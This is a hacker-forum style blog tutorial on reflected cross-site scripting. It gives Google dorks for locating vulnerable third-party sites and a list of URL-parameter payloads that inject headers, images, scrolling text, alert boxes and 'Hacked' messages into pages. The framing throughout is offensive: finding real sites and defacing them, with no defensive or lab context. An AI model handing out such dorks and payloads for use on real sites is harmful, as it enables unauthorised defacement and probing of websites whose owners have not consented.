 |
| Demo Of XSS Site hacking. |
In this tutorial i am going to teach you cross site scripting.
In short XSS.
- Tutorial By :- Chinmoy Pratim Borah.
- Host By :- Wild Wings Hackers.
- Tutorial About :- Advanced Cross Site Scripting [[ For Noobs and Advanced Hackers ]]
- Difficulty Level :- Medium.
- Dork :- inurl:"contentPage.php?id="
inurl:"displayResource.php?id=" - Browser Used :- Google Chrome.
Okay Now Let's Start!
1. What Is Cross Site Scripting?
Ans :- Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers toinject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.
2. What Type Of Cross Site Scripting Are There?
Ans :- There are two types of Cross Site Scripting. They Are
1. Non-persistent
2. Persistent
-----------------------------------------------------------------------------
Steps.....
1. Go to Goole and type this XSS Dorks (Any 1 You can google for more)
inurl:"contentPage.php?id="
inurl:"displayResource.php?id="
inurl:"displayResource.php?id="
2. You get some results like : site.com/content.php?id=
3. To Check That The Site Is Vulnerable or not, we will add this script after '='
<h1> Test </h1>
Example :- site.com/content.php?id=<h1> test </h1>
if it will show you "Test" word in Header tag this Its Vulnerable.
As Shown In The Pic :-
 |
| Checking A Site To XSS Vul
To show Header
http://site.com/error.php?error=<h1>Hacked</h1>
To show header in center
http://site.com/error.php?error=<center><h1>Hacked</h1></center> to show Title
http://site.com/error.php?error=<title>Hacked</title>
to Add a Image http://site.comerror.php?error=<img src="http://yourimage link.com/-EtkPBc32dF0/UIgFEjw-cuI/AAAAAAAABGM/eIdp8Qg0hUg/s640/cats.jpg"/> to add a Message
http://site.com/error.php?error=<p><b>Your Message Here<b></p>
to write message in next lines http://site.com/error.php?error=<p><b>First line<br>Second Line <b></p>
To add a scrolling Text
http://site.com/error.php?error=<marquee>Scrolling text Here</marquee>
To Add a alert box
http://site.com/error.php?error=<script>alert("hello");</script>
To add background colour in page
http://site.com/error.php?error=<body bgcolor="red"/>
|
___________________________________________________________
Note :- The Best Browser For Cross Site Scripting Are
1. Google Chrome.
2. Mozilla Firefox.
___________________________________________________________
IF you have any question you can freely ask me!! Just Comment You Question Below.
No comments:
Post a Comment